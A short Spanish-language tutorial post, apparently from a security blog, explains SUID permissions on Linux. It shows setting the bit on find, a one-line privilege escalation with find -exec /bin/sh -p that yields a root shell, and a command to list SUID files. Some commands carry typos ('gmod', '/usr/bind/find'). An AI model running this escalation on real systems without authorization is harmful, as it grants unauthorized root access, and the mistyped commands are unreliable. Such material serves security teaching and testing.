1 minuto(s) estimado(s) de lectura
Permisos SIUD
y su explotación
Este tipo de permiso establece el ID de usuario del propietario de manera temporal, el cual se consigue agregando un 4 al momento de otorgar los permisos:
Si antes se realizaba
root> gmod 755 /usr/bind/find
[-rwxr-xr-x]
Ahora si quieres agregar el permiso SIUD, se debe colocar de la siguiente forma
root> gmod 4755 /usr/bind/find
[-rwsr-xr-x]
Ahora en este caso se lo asignamos a find, el problema es que esto es vulnerable pues si aplicamos el siguiente comando, podremos obtener acceso como root:
user@user:~$ find . -exec /bin/sh -p \; -quit
# whoami
root
https://gtfobins.github.io/gtfobins/find/
Esto pasa debido a que a user se le asigna de manera temporal el permiso de root (propietario), y en el caso mostrado se abre una shell aprovechando la vulnerabilidad.
Para encontrar ficheros con permisos SIUD, se puede con el siguiente comando:
find / -perm -4000 -exec ls -l {} \; 2>/dev/null
